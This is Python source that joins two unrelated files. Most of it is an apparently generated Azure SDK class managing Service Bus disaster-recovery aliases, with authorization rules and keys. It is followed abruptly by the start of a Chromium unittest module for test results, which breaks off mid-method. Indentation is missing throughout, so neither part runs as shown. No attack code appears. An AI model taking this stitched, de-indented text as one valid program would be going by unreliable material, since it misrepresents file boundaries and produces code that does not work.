:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def check_name_availability(
self,
resource_group_name, # type: str
namespace_name, # type: str
parameters, # type: "_models.CheckNameAvailability"
**kwargs # type: Any
):
# type: (...) -> "_models.CheckNameAvailabilityResult"
"""Check the give namespace name availability.
:param resource_group_name: Name of the Resource group within the Azure subscription.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param parameters: Parameters to check availability of the given namespace name.
:type parameters: ~azure.mgmt.servicebus.v2021_01_01_preview.models.CheckNameAvailability
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CheckNameAvailabilityResult, or the result of cls(response)
:rtype: ~azure.mgmt.servicebus.v2021_01_01_preview.models.CheckNameAvailabilityResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CheckNameAvailabilityResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-01-01-preview"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.check_name_availability.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str', max_length=50, min_length=6),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'CheckNameAvailability')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('CheckNameAvailabilityResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
check_name_availability.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServiceBus/namespaces/{namespaceName}/disasterRecoveryConfigs/CheckNameAvailability'} # type: ignore
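    # Hedged usage sketch (not generated code). Assumptions: `client` is an
    # already-constructed ServiceBusManagementClient exposing this operation
    # group as `disaster_recovery_configs`, and the resource names are
    # placeholders.
    #
    #     from azure.mgmt.servicebus.v2021_01_01_preview.models import CheckNameAvailability
    #
    #     result = client.disaster_recovery_configs.check_name_availability(
    #         resource_group_name="my-rg",
    #         namespace_name="my-namespace",
    #         parameters=CheckNameAvailability(name="my-alias"))
    #     print(result.name_available, result.reason)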
def list(
self,
resource_group_name, # type: str
namespace_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.ArmDisasterRecoveryListResult"]
"""Gets all Alias(Disaster Recovery configurations).
:param resource_group_name: Name of the Resource group within the Azure subscription.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ArmDisasterRecoveryListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.servicebus.v2021_01_01_preview.models.ArmDisasterRecoveryListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ArmDisasterRecoveryListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-01-01-preview"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str', max_length=50, min_length=6),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('ArmDisasterRecoveryListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServiceBus/namespaces/{namespaceName}/disasterRecoveryConfigs'} # type: ignore
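    # Hedged sketch of consuming the pager returned by list() (same hypothetical
    # `client` as in the sketch above). The ItemPaged iterator is lazy, so the
    # per-page HTTP requests built by prepare_request/get_next run during
    # iteration, not when list() is called.
    #
    #     for alias_config in client.disaster_recovery_configs.list("my-rg", "my-namespace"):
    #         print(alias_config.name)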
def create_or_update(
self,
resource_group_name, # type: str
namespace_name, # type: str
alias, # type: str
parameters, # type: "_models.ArmDisasterRecovery"
**kwargs # type: Any
):
# type: (...) -> Optional["_models.ArmDisasterRecovery"]
"""Creates or updates a new Alias(Disaster Recovery configuration).
:param resource_group_name: Name of the Resource group within the Azure subscription.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param alias: The Disaster Recovery configuration name.
:type alias: str
:param parameters: Parameters required to create an Alias(Disaster Recovery configuration).
:type parameters: ~azure.mgmt.servicebus.v2021_01_01_preview.models.ArmDisasterRecovery
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ArmDisasterRecovery, or the result of cls(response)
:rtype: ~azure.mgmt.servicebus.v2021_01_01_preview.models.ArmDisasterRecovery or None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.ArmDisasterRecovery"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-01-01-preview"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_or_update.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str', max_length=50, min_length=6),
'alias': self._serialize.url("alias", alias, 'str', max_length=50, min_length=1),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'ArmDisasterRecovery')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ArmDisasterRecovery', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServiceBus/namespaces/{namespaceName}/disasterRecoveryConfigs/{alias}'} # type: ignore
def delete(
self,
resource_group_name, # type: str
namespace_name, # type: str
alias, # type: str
**kwargs # type: Any
):
# type: (...) -> None
"""Deletes an Alias(Disaster Recovery configuration).
:param resource_group_name: Name of the Resource group within the Azure subscription.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param alias: The Disaster Recovery configuration name.
:type alias: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-01-01-preview"
accept = "application/json"
# Construct URL
url = self.delete.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str', max_length=50, min_length=6),
'alias': self._serialize.url("alias", alias, 'str', max_length=50, min_length=1),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServiceBus/namespaces/{namespaceName}/disasterRecoveryConfigs/{alias}'} # type: ignore
def get(
self,
resource_group_name, # type: str
namespace_name, # type: str
alias, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.ArmDisasterRecovery"
"""Retrieves Alias(Disaster Recovery configuration) for primary or secondary namespace.
:param resource_group_name: Name of the Resource group within the Azure subscription.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param alias: The Disaster Recovery configuration name.
:type alias: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ArmDisasterRecovery, or the result of cls(response)
:rtype: ~azure.mgmt.servicebus.v2021_01_01_preview.models.ArmDisasterRecovery
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ArmDisasterRecovery"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-01-01-preview"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str', max_length=50, min_length=6),
'alias': self._serialize.url("alias", alias, 'str', max_length=50, min_length=1),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('ArmDisasterRecovery', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServiceBus/namespaces/{namespaceName}/disasterRecoveryConfigs/{alias}'} # type: ignore
def break_pairing(
self,
resource_group_name, # type: str
namespace_name, # type: str
alias, # type: str
**kwargs # type: Any
):
# type: (...) -> None
"""This operation disables the Disaster Recovery and stops replicating changes from primary to
secondary namespaces.
:param resource_group_name: Name of the Resource group within the Azure subscription.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param alias: The Disaster Recovery configuration name.
:type alias: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-01-01-preview"
accept = "application/json"
# Construct URL
url = self.break_pairing.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str', max_length=50, min_length=6),
'alias': self._serialize.url("alias", alias, 'str', max_length=50, min_length=1),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
break_pairing.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServiceBus/namespaces/{namespaceName}/disasterRecoveryConfigs/{alias}/breakPairing'} # type: ignore
def fail_over(
self,
resource_group_name, # type: str
namespace_name, # type: str
alias, # type: str
parameters=None, # type: Optional["_models.FailoverProperties"]
**kwargs # type: Any
):
# type: (...) -> None
"""Invokes GEO DR failover and reconfigure the alias to point to the secondary namespace.
:param resource_group_name: Name of the Resource group within the Azure subscription.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param alias: The Disaster Recovery configuration name.
:type alias: str
        :param parameters: Parameters required to invoke GEO DR failover of the alias.
:type parameters: ~azure.mgmt.servicebus.v2021_01_01_preview.models.FailoverProperties
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-01-01-preview"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.fail_over.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str', max_length=50, min_length=6),
'alias': self._serialize.url("alias", alias, 'str', max_length=50, min_length=1),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
if parameters is not None:
body_content = self._serialize.body(parameters, 'FailoverProperties')
else:
body_content = None
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
fail_over.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServiceBus/namespaces/{namespaceName}/disasterRecoveryConfigs/{alias}/failover'} # type: ignore
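    # Hedged sketch of invoking failover (assumption: in the Geo-DR flow the
    # failover is issued against the secondary namespace, and the optional
    # FailoverProperties body may be omitted, in which case no request body is
    # sent):
    #
    #     client.disaster_recovery_configs.fail_over(
    #         resource_group_name="my-rg",
    #         namespace_name="my-secondary-namespace",
    #         alias="my-alias")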
def list_authorization_rules(
self,
resource_group_name, # type: str
namespace_name, # type: str
alias, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.SBAuthorizationRuleListResult"]
"""Gets the authorization rules for a namespace.
:param resource_group_name: Name of the Resource group within the Azure subscription.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param alias: The Disaster Recovery configuration name.
:type alias: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SBAuthorizationRuleListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.servicebus.v2021_01_01_preview.models.SBAuthorizationRuleListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SBAuthorizationRuleListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-01-01-preview"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_authorization_rules.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str', max_length=50, min_length=6),
'alias': self._serialize.url("alias", alias, 'str', max_length=50, min_length=1),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('SBAuthorizationRuleListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_authorization_rules.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServiceBus/namespaces/{namespaceName}/disasterRecoveryConfigs/{alias}/authorizationRules'} # type: ignore
def get_authorization_rule(
self,
resource_group_name, # type: str
namespace_name, # type: str
alias, # type: str
authorization_rule_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.SBAuthorizationRule"
"""Gets an authorization rule for a namespace by rule name.
:param resource_group_name: Name of the Resource group within the Azure subscription.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param alias: The Disaster Recovery configuration name.
:type alias: str
:param authorization_rule_name: The authorization rule name.
:type authorization_rule_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SBAuthorizationRule, or the result of cls(response)
:rtype: ~azure.mgmt.servicebus.v2021_01_01_preview.models.SBAuthorizationRule
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SBAuthorizationRule"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-01-01-preview"
accept = "application/json"
# Construct URL
url = self.get_authorization_rule.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str', max_length=50, min_length=6),
'alias': self._serialize.url("alias", alias, 'str', max_length=50, min_length=1),
'authorizationRuleName': self._serialize.url("authorization_rule_name", authorization_rule_name, 'str', max_length=50, min_length=1),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('SBAuthorizationRule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_authorization_rule.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServiceBus/namespaces/{namespaceName}/disasterRecoveryConfigs/{alias}/authorizationRules/{authorizationRuleName}'} # type: ignore
def list_keys(
self,
resource_group_name, # type: str
namespace_name, # type: str
alias, # type: str
authorization_rule_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.AccessKeys"
"""Gets the primary and secondary connection strings for the namespace.
:param resource_group_name: Name of the Resource group within the Azure subscription.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param alias: The Disaster Recovery configuration name.
:type alias: str
:param authorization_rule_name: The authorization rule name.
:type authorization_rule_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AccessKeys, or the result of cls(response)
:rtype: ~azure.mgmt.servicebus.v2021_01_01_preview.models.AccessKeys
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AccessKeys"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-01-01-preview"
accept = "application/json"
# Construct URL
url = self.list_keys.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str', max_length=50, min_length=6),
'alias': self._serialize.url("alias", alias, 'str', max_length=50, min_length=1),
'authorizationRuleName': self._serialize.url("authorization_rule_name", authorization_rule_name, 'str', max_length=50, min_length=1),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('AccessKeys', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_keys.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServiceBus/namespaces/{namespaceName}/disasterRecoveryConfigs/{alias}/authorizationRules/{authorizationRuleName}/listKeys'} # type: ignore
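    # Hedged end-to-end sketch of an alias lifecycle with this operations group.
    # Assumptions (not taken from the generated code above): `client` is a
    # ServiceBusManagementClient, both namespaces already exist, and the string
    # arguments are placeholders.
    #
    #     from azure.mgmt.servicebus.v2021_01_01_preview.models import ArmDisasterRecovery
    #
    #     ops = client.disaster_recovery_configs
    #     ops.create_or_update("my-rg", "primary-ns", "my-alias",
    #                          ArmDisasterRecovery(partner_namespace=secondary_namespace_id))
    #     config = ops.get("my-rg", "primary-ns", "my-alias")
    #     keys = ops.list_keys("my-rg", "primary-ns", "my-alias", "RootManageSharedAccessKey")
    #     ops.break_pairing("my-rg", "primary-ns", "my-alias")  # or fail over from the secondary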
|
|
#!/usr/bin/env vpython
# Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unittests for test_result_util.py."""
import collections
import copy
import mock
import unittest
import test_result_util
from test_result_util import TestResult, TestStatus, ResultCollection
import test_runner_test
PASSED_RESULT = TestResult(
'passed/test', TestStatus.PASS, duration=1233, test_log='Logs')
FAILED_RESULT = TestResult(
'failed/test', TestStatus.FAIL, duration=1233, test_log='line1\nline2')
FAILED_RESULT_DUPLICATE = TestResult(
'failed/test', TestStatus.FAIL, test_log='line3\nline4')
DISABLED_RESULT = TestResult(
'disabled/test',
TestStatus.SKIP,
expected_status=TestStatus.SKIP,
attachments={'name': '/path/to/name'})
UNEXPECTED_SKIPPED_RESULT = TestResult('unexpected/skipped_test',
TestStatus.SKIP)
CRASHED_RESULT = TestResult('crashed/test', TestStatus.CRASH)
FLAKY_PASS_RESULT = TestResult('flaky/test', TestStatus.PASS)
FLAKY_FAIL_RESULT = TestResult(
'flaky/test', TestStatus.FAIL, test_log='line1\nline2')
ABORTED_RESULT = TestResult('aborted/test', TestStatus.ABORT)
class UtilTest(test_runner_test.TestCase):
"""Tests util methods in test_result_util module."""
def test_validate_kwargs(self):
"""Tests _validate_kwargs."""
with self.assertRaises(AssertionError) as context:
TestResult('name', TestStatus.PASS, unknown='foo')
expected_message = ("Invalid keyword argument(s) in")
self.assertTrue(expected_message in str(context.exception))
with self.assertRaises(AssertionError) as context:
ResultCollection(test_log='foo')
expected_message = ("Invalid keyword argument(s) in")
self.assertTrue(expected_message in str(context.exception))
def test_validate_test_status(self):
"""Tests exception raised from validation."""
with self.assertRaises(TypeError) as context:
test_result_util._validate_test_status('TIMEOUT')
expected_message = ('Invalid test status: TIMEOUT. Should be one of')
self.assertTrue(expected_message in str(context.exception))
def test_to_standard_json_literal(self):
"""Tests _to_standard_json_literal."""
status = test_result_util._to_standard_json_literal(TestStatus.FAIL)
self.assertEqual(status, 'FAIL')
status = test_result_util._to_standard_json_literal(TestStatus.ABORT)
self.assertEqual(status, 'TIMEOUT')
class TestResultTest(test_runner_test.TestCase):
"""Tests TestResult class APIs."""
def test_init(self):
"""Tests class initialization."""
test_result = PASSED_RESULT
self.assertEqual(test_result.name, 'passed/test')
self.assertEqual(test_result.status, TestStatus.PASS)
self.assertEqual(test_result.expected_status, TestStatus.PASS)
self.assertEqual(test_result.test_log, 'Logs')
def test_compose_result_sink_tags(self):
"""Tests _compose_result_sink_tags."""
disabled_test_tags = [('test_name', 'disabled/test'),
('disabled_test', 'true')]
unexpected_skip_test_tags = [('test_name', 'unexpected/skipped_test'),
('disabled_test', 'false')]
not_skip_test_tags = [('test_name', 'passed/test')]
not_skip_test_result = PASSED_RESULT
self.assertEqual(not_skip_test_tags,
not_skip_test_result._compose_result_sink_tags())
disabled_test_result = DISABLED_RESULT
self.assertEqual(disabled_test_tags,
disabled_test_result._compose_result_sink_tags())
unexpected_skip_test_result = UNEXPECTED_SKIPPED_RESULT
self.assertEqual(unexpected_skip_test_tags,
unexpected_skip_test_result._compose_result_sink_tags())
@mock.patch('result_sink_util.ResultSinkClient.post')
def test_report_to_result_sink(self, mock_post):
